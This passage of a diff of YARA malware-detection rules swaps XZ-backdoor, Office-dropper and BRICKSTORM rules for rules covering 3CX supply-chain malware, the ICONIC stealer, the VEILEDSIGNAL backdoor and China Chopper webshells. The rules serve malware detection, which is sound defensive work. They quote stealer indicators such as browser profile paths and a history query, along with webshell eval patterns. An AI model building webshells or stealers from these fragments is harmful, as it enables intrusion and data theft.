-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L48-L60"
+		description = "Detects malicious DYLIB files related to 3CX compromise"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a19904d3-9b2d-561f-b734-20bf09584fa7"
+		date = "2023-03-30"
+		modified = "2023-12-05"
+		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2024d4b8346c4f74524bb7f3c6b2850684c19471a00e6fa60fff1c41e4a86b6"
-		score = 85
+		logic_hash = "e52c76de1e995cc7084ddb390b60f4bc66e5bdf89aaa28ef3fd70578ed3145a6"
+		score = 80
 		quality = 85
-		tags = "CVE-2024-3094"
+		tags = ""
+		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
+		hash2 = "fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7"
 
 	strings:
-		$x1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"
+		$xc1 = { 37 15 00 13 16 16 1B 55 4F 54 4A 5A 52 2D 13 14
+               1E 15 0D 09 5A 34 2E 5A 4B 4A 54 4A 41 5A 2D 13
+               14 4C 4E 41 5A 02 4C 4E 53 5A 3B 0A 0A 16 1F 2D
+               1F 18 31 13 0E 55 4F 49 4D 54 49 4C 5A 52 31 32
+               2E 37 36 56 5A 16 13 11 1F 5A 3D 1F 19 11 15 53
+               5A 39 12 08 15 17 1F 55 4B 4A 42 54 4A 54 4F 49
+               4F 43 54 4B 48 42 5A 29 1B 1C 1B 08 13 55 4F 49
+               4D 54 49 4C 7A }
+		$xc2 = { 41 49 19 02 25 1b 0f 0e 12 25 0e 15 11 1f 14 25 19 15 14 0e 1f 14 0e 47 5f 09 41 25 25 0e 0f 0e 17 1b 47 }
+		$xc3 = { 55 29 03 09 0e 1f 17 55 36 13 18 08 1b 08 03 55 39 15 08 1f 29 1f 08 0c 13 19 1f 09 55 29 03 09 0e 1f 17 2c 1f 08 09 13 15 14 54 0a 16 13 09 0e }
 
 	condition:
-		$x1
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_SH_Indicators_Mar24_1 : FILE
+rule SIGNATURE_BASE_APT_SUSP_NK_3CX_Malicious_Samples_Mar23_1
 {
 	meta:
-		description = "Detects characteristics found in obfuscated script (used in the backdoored XZ package, but could match on others, too)"
-		author = "Florian Roth"
-		id = "f9fcc326-75d6-5a5a-a8b5-7de15a11448e"
-		date = "2024-04-06"
-		modified = "2024-04-24"
-		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L62-L75"
+		description = "Detects indicator (event name) found in samples related to 3CX compromise"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b233846a-19df-579b-a674-233d66824008"
+		date = "2023-03-30"
+		modified = "2023-12-05"
+		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L216-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5abf8184e0b1b18ccc513e00e9db241b4983923ae97f495396d73f0fb162192"
-		score = 60
+		logic_hash = "6ab8a4ac184eaba6eb56bfc49d6fa03f9b0877d75294aa9a242e9ac96482fab0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
+		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
 
 	strings:
-		$s1 = "eval $"
+		$a1 = "AVMonitorRefreshEvent" wide fullword
 
 	condition:
-		uint8( 1 ) == 0x3d and $s1 in ( filesize -20 .. filesize )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Office_Dropper_Strings : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_4
 {
 	meta:
-		description = "Detects Office droppers that include a notice to enable active content"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6560fdf7-46e8-5c16-8263-a36f1dec7868"
-		date = "2018-09-13"
+		description = "Detects decrypted payload loaded inside 3CXDesktopApp.exe which downloads info stealer"
+		author = "MalGamy (Nextron Systems)"
+		id = "d11170df-570c-510c-80ec-39048acd0fbd"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L1-L17"
+		reference = "https://twitter.com/WhichbufferArda/status/1641404343323688964?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L234-L249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a66a86eb99a3e7cd02e3444714c6c88b423cd0ea1e6210bf91da01cf804105f"
-		score = 65
+		hash = "851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7"
+		logic_hash = "2fd56527a094b1f155cf33af402328835d4fb8aee9a058742d3e3763acef9e46"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a1 = "_VBA_PROJECT" wide
-		$s1 = "click enable editing" fullword ascii
-		$s2 = "click enable content" fullword ascii
-		$s3 = "\"Enable Editing\"" fullword ascii
-		$s4 = "\"Enable Content\"" fullword ascii
+		$op1 = {41 69 D0 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 [4] 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 [4] 33 C1 4C 0F AF CF 4D 03 CA 45 8B D1 4C 0F AF D7 41 8D 0C 11 49 C1 E9 ?? 02 C8}
+		$op2 = {4D 0F AF CC 44 69 C2 [4] 4C 03 C9 45 8B D1 4D 0F AF D4 41 8D 0C 11 41 81 C0 [4] 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1}
+		$op3 = {33 C1 4C 0F AF C7 8B C8 C1 E1 ?? 4D 03 C2 33 C1}
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1 and 1 of ( $s* )
+		2 of them
 }
-rule SIGNATURE_BASE_SUSP_Enablecontent_String_Gen : FILE
+rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Backdoor_Mar23 : FILE
 {
 	meta:
-		description = "Detects suspicious string that asks to enable active content in Office Doc"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d763bc21-2925-55df-85e0-1ee857e921ca"
-		date = "2019-02-12"
+		description = "Detects 3CXDesktopApp MacOS Backdoor component"
+		author = "X__Junior (Nextron Systems)"
+		id = "80046c8e-0c2a-5885-b140-a6084f48160d"
+		date = "2023-03-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L19-L40"
+		reference = "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cde995ab0486fdafdc98e36c28a1f786ee7485387158f7337acd5f7dd0e3fed1"
-		score = 65
+		hash = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
+		logic_hash = "777a0a29c376f3697021dd627e716c31bda7933c5f40a8fe79b80e3cea46ce43"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
 
 	strings:
-		$e1 = "Enable Editing" fullword ascii
-		$e2 = "Enable Content" fullword ascii
-		$e3 = "Enable editing" fullword ascii
-		$e4 = "Enable content" fullword ascii
+		$sa1 = "%s/.main_storage" ascii fullword
+		$sa2 = "%s/UpdateAgent" ascii fullword
+		$op1 = { 31 C0 41 80 34 06 ?? 48 FF C0 48 83 F8 ?? 75 ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F7 48 89 D9 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 F7 5B 41 5E 41 5F E9 ?? ?? ?? ?? 5B 41 5E 41 5F C3}
+		$op2 = { 0F 11 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 31 C0 80 B4 04 ?? ?? ?? ?? ?? 48 FF C0}
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( $e1 in ( 0 .. 3000 ) or $e2 in ( 0 .. 3000 ) or $e3 in ( 0 .. 3000 ) or $e4 in ( 0 .. 3000 ) or 2 of them )
+		(( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 6MB and ( ( 1 of ( $sa* ) and 1 of ( $op* ) ) or all of ( $sa* ) ) ) or ( all of ( $op* ) )
 }
-rule SIGNATURE_BASE_SUSP_Worddoc_VBA_Macro_Strings : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_ICONIC_Stealer_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects suspicious strings in Word Doc that indcate malicious use of VBA macros"
+		description = "Detects ICONIC stealer payload used in the 3CX incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "210baf6e-ec67-5bc4-ba27-6a6de0c11a73"
-		date = "2019-02-12"
+		id = "e92b5b90-1146-5235-9711-a4d42689c49b"
+		date = "2023-03-31"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L42-L63"
+		reference = "https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/attachments/iconicstealer.7z"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L279-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "441e4a8e90d6045d0ad6a959ce56e834960c48083343add8e4f519f4b83bc82d"
-		score = 60
+		logic_hash = "1f57a2af4a5b9e71e2b72ddc3839400731d9d37eb4349c393b37b3f86c0c7f73"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
+		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
 
 	strings:
-		$a1 = "\\Microsoft Shared\\" ascii
-		$a2 = "\\VBA\\" ascii
-		$a3 = "Microsoft Office Word" fullword ascii
-		$a4 = "PROJECTwm" fullword wide
-		$s1 = "AppData" fullword ascii
-		$s2 = "Document_Open" fullword ascii
-		$s3 = "Project1" fullword ascii
-		$s4 = "CreateObject" fullword ascii
+		$s1 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\": \"%d.%d.%d\"}" wide fullword
+		$s2 = "******************************** %s ******************************" wide fullword
+		$s3 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" wide fullword
+		$s4 = "AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide fullword
+		$s5 = "SELECT url, title FROM urls ORDER BY id DESC LIMIT 500" wide fullword
+		$s6 = "TEXT value in %s.%s" ascii fullword
+		$op1 = { 48 63 d1 48 63 ce 49 03 d1 49 03 cd 4c 63 c7 e8 87 1f 09 00 8b 45 d0 44 8d 04 37 }
+		$op2 = { 48 8b c8 8b 56 f0 48 89 46 d8 e8 78 8f f8 ff e9 ec 13 00 00 c7 46 20 ff ff ff ff e9 e0 13 00 00 33 ff }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 4 of them or 6 of them
 }
-rule SIGNATURE_BASE_SUSP_Officedoc_VBA_Base64Decode : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Macos_Elextron_App_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects suspicious VBA code with Base64 decode functions"
+		description = "Detects macOS malware used in the 3CX incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99690116-fc89-53d7-8f29-575d75d53fc9"
-		date = "2019-06-21"
+		id = "7a3755d4-37e5-5d3b-93aa-34edb557f2d5"
+		date = "2023-03-31"
 		modified = "2023-12-05"
-		reference = "https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L65-L80"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L306-L328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fb094c9991f93e9d1003832dc11a58efa8281e9fe844e61e27dfd077f55ad39"
-		score = 70
+		logic_hash = "00dd28c3edd94e04e35ee9e3a43c30b5a0a1ad21ec8ecf2099bbeb9de2fca8d0"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
+		hash1 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
+		hash2 = "f7ba7f9bf608128894196cf7314f68b78d2a6df10718c8e0cd64dbe3b86bc730"
 
 	strings:
-		$s1 = "B64_CHAR_DICT" ascii
-		$s2 = "Base64Decode" ascii
-		$s3 = "Base64Encode" ascii
+		$a1 = "com.apple.security.cs.allow-unsigned-executable-memory" ascii
+		$a2 = "com.electron.3cx-desktop-app" ascii fullword
+		$s1 = "s8T/RXMlALbXfowom9qk15FgtdI=" ascii
+		$s2 = "o8NQKPJE6voVZUIGtXihq7lp0cY=" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 60KB and 2 of them
+		uint16( 0 ) == 0xfacf and filesize < 400KB and ( all of ( $a* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_SUSP_VBA_Filesystem_Access : FILE
+rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Updateagent_Mar23 : FILE
 {
 	meta:
-		description = "Detects suspicious VBA that writes to disk and is activated on document open"
+		description = "Detects 3CXDesktopApp MacOS UpdateAgent backdoor component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91241b91-ca3f-5817-bf78-550fe015b467"
-		date = "2019-06-21"
+		id = "596eb6d0-f96f-5106-ae67-9372d238e4cf"
+		date = "2023-03-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L82-L100"
+		reference = "https://twitter.com/patrickwardle/status/1641692164303515653?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L330-L354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "13d7e0708968a7700308e6216ea5d0a396f9335137ae1e33c3b34a2f54012ec6"
-		score = 60
+		hash = "9e9a5f8d86356796162cee881c843cde9eaedfb3"
+		logic_hash = "0818a8f0b59a9baaefaa0b505f8261e0e0df283e79da8e95dc71e9afdca224ab"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
 
 	strings:
-		$s1 = "\\Common Files\\Microsoft Shared\\" wide
-		$s2 = "Scripting.FileSystemObject" ascii
-		$a1 = "Document_Open" ascii
-		$a2 = "WScript.Shell" ascii
-		$a3 = "AutoOpen" fullword ascii
+		$a1 = "/3CX Desktop App/.main_storage" ascii
+		$x1 = ";3cx_auth_token_content=%s;__tutma=true"
+		$s1 = "\"url\": \"https://"
+		$s3 = "/dev/null"
+		$s4 = "\"AccountName\": \""
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 100KB and all of ( $s* ) and 1 of ( $a* )
+		uint16( 0 ) == 0xfeca and filesize < 6MB and ( 1 of ( $x* ) or ( $a1 and all of ( $s* ) ) ) or all of them
 }
-rule SIGNATURE_BASE_SUSP_Excel_IQY_Remoteuri_Syntax : FILE
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_2
 {
 	meta:
-		description = "Detects files with Excel IQY RemoteURI syntax"
-		author = "Nick Carr"
-		id = "ea3427da-9cce-5ad9-9c78-e3cee802ba80"
-		date = "2018-08-17"
-		modified = "2023-11-25"
-		reference = "https://twitter.com/ItsReallyNick/status/1030330473954897920"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L102-L120"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "ff1fa0bd-19b7-553a-9506-bc5aa5d29056"
+		date = "2023-04-29"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L373-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7033b0a4226dd289ecc670a0807e4159dd4486f52bc80a6b5ddd34d6961ab163"
-		score = 55
+		hash = "c4887a5cd6d98e273ba6e9ea3c1d8f770ef26239819ea24a1bfebd81d6870505"
+		logic_hash = "a15f7f06be5e620baf33d595afc35246dae0307978984af832940a74ef2c84eb"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$URL = "http"
-		$fp1 = "https://go.microsoft.com"
+		$sa1 = "\\.\\pipe\\gecko.nativeMessaging" ascii
+		$sa2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40" ascii
+		$sa3 = "application/json, text/javascript, */*; q=0.01" ascii
+		$op1 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
+		$op2 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
+		$op3 = { 48 89 74 24 ?? 45 33 C0 89 74 24 ?? 41 B9 ?? ?? ?? ?? 89 74 24 ?? 48 8B D8 48 C7 00 ?? ?? ?? ?? 48 8B 0F 41 8D 50 ?? 48 89 44 24 ?? 89 74 24 ?? FF 15}
 
 	condition:
-		uint32( 0 ) == 0x0d424557 and uint32( 4 ) == 0x0a0d310a and filesize < 1MB and $URL and not 1 of ( $fp* )
+		all of ( $op* ) or all of ( $sa* )
 }
-rule SIGNATURE_BASE_SUSP_Macro_Sheet_Obfuscated_Char : FILE
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_3
 {
 	meta:
-		description = "Finding hidden/very-hidden macros with many CHAR functions"
-		author = "DissectMalware"
-		id = "791e9bba-3e4e-5efd-a800-a612c6f92cfb"
-		date = "2020-04-07"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "6b6f984e-242a-5b84-baa9-6311992cde9b"
+		date = "2023-04-29"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DissectMalware/status/1247595433305800706"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_office_dropper.yar#L122-L139"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L394-L410"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0953d1f916df570cb3d053bf4fdac196bdbd806df4b6c0a982ed9949a3676e6c"
-		score = 65
+		hash = "595392959b609caf088d027a23443cf2fefd043607ccdec3de19ad3bb43a74b1"
+		logic_hash = "58f860926db4a7dfefbd39ee35efaa0081b7e31a361efce02f5144266ab652a6"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		hash1 = "0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b"
+		tags = ""
 
 	strings:
-		$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
-		$s1 = "Excel" fullword ascii
-		$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
-		$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
-		$char_func = {06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1E 3D  00 41 6F 00}
+		$op1 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
+		$op2 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
+		$op3 = { 8B 54 24 ?? 4C 8D 4C 24 ?? 45 8D 46 ?? 44 89 74 24 ?? 48 8B CB FF 15}
+		$op4 = { 48 8D 44 24 ?? 45 33 C9 41 B8 01 00 00 40 48 89 44 24 ?? 41 8B D5 48 8B CF FF 15}
 
 	condition:
-		$ole_marker at 0 and 1 of ( $macro_sheet_h* ) and #char_func > 10 and $s1
+		all of them
 }
-rule SIGNATURE_BASE_MAL_G_APT_Backdoor_BRICKSTORM_3 : FILE
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_4
 {
 	meta:
-		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "22172f5a-0560-56f8-9c0c-12eb6807e3bb"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L1-L17"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "77340ec0-36bb-5c47-995f-4e6f76b68fe1"
+		date = "2023-04-29"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L412-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "931eacd7e5250d29903924c31f41b7e5"
-		logic_hash = "168bc2bdfff6a135f4ec89f8cf79051e6dcd242b314e3238553d67929995a9ea"
-		score = 75
+		hash = "9b0761f81afb102bb784b398b16faa965594e469a7fcfdfd553ced19cc17e70b"
+		logic_hash = "ad22df404d948073428fc35b0c8fbfea25da3bc66e46ea6397ff751ae65d5939"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$str1 = { 48 8B 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 04 24 [0-5] E8 ?? ?? ?? ?? EB ?? }
-		$str4 = "decompress" ascii
-		$str5 = "MIMEHeader" ascii
-		$str6 = "ResolveReference" ascii
-		$str7 = "115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951" ascii
+		$op1 = { 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 }
+		$op2 = { 48 8B C8 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C0 4C 8D 4D ?? B2 01 41 8D 48 ?? FF D0}
+		$op3 = { 33 FF C7 44 24 ?? 38 02 00 00 33 D2 8D 4F ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 FF 74 ?? 48 8D 54 24 ?? 48 8B C8 FF 15 }
+		$op4 = { 4C 8D 05 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8B C8 33 D2 89 4C 24 ?? FF 15 }
 
 	condition:
-		uint16( 0 ) == 0x457F and all of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_G_Backdoor_BRICKSTORM_2 : FILE
+rule SIGNATURE_BASE_Chinachopper_Generic : FILE
 {
 	meta:
-		description = "Detects BRICKSTORM backdoor used by APT group UNC5221 (China Nexus)"
-		author = "Google Threat Intelligence Group (GTIG) (modified by Florian Roth)"
-		id = "3300ff33-a32f-59e4-b4bd-d434345da611"
-		date = "2025-09-25"
-		modified = "2025-10-07"
-		reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_brickstorm_sep25.yar#L19-L51"
+		description = "China Chopper Webshells - PHP and ASPX"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2473cef1-88cf-5b76-a87a-2978e6780b4f"
+		date = "2015-03-10"
+		modified = "2022-10-27"
+		reference = "https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_webshell_chinachopper.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afea32d3c817473ec0dbc20177daa4070f847c23295318fa093fc3a96a15e764"
+		logic_hash = "34cb81b077d6dae5b4565001b2ab28897c6c554f00aa102601fb9c416c6c0f09"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$decr1 = { 0F B6 4C 04 ?? 0F B6 54 04 ?? 31 D1 88 4C 04 ?? 48 FF C0 [0-4] 48 83 F8 ?? 7C }
-		$decr2 = { 40 88 7C 34 34 48 FF C3 48 FF C6 48 39 D6 7D 18 0F B6 3B 48 39 CE 73 63 44 0F B6 04 30 44 31 C7 48 83 FE 04 72 DA }
-		$decr3 = { 0F B6 54 0C ?? 0F B6 5C 0C ?? 31 DA 88 14 08 48 FF C1 48 83 F9 ?? 7C E8 }
-		$str1 = "main.selfWatcher"
-		$str2 = "main.copyFile"
-		$str3 = "main.startNew"
-		$str4 = "WRITE_LOG=true"
-		$str5 = "WRITE_LOGWednesday"
-		$str6 = "vami-httpdvideo/webm"
-		$str7 = "/opt/vmware/sbin/"
-		$str8 = "/home/vsphere-ui/"
-		$str9 = "/opt/vmware/sbin/vami-http"
-		$str10 = "main.getVFromEnv"
+		$x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(Request\.Item\[.{,100}unsafe/
+		$x_php = /<?php.\@eval\(\$_POST./
+		$fp1 = "GET /"
+		$fp2 = "POST /"
 
 	condition:
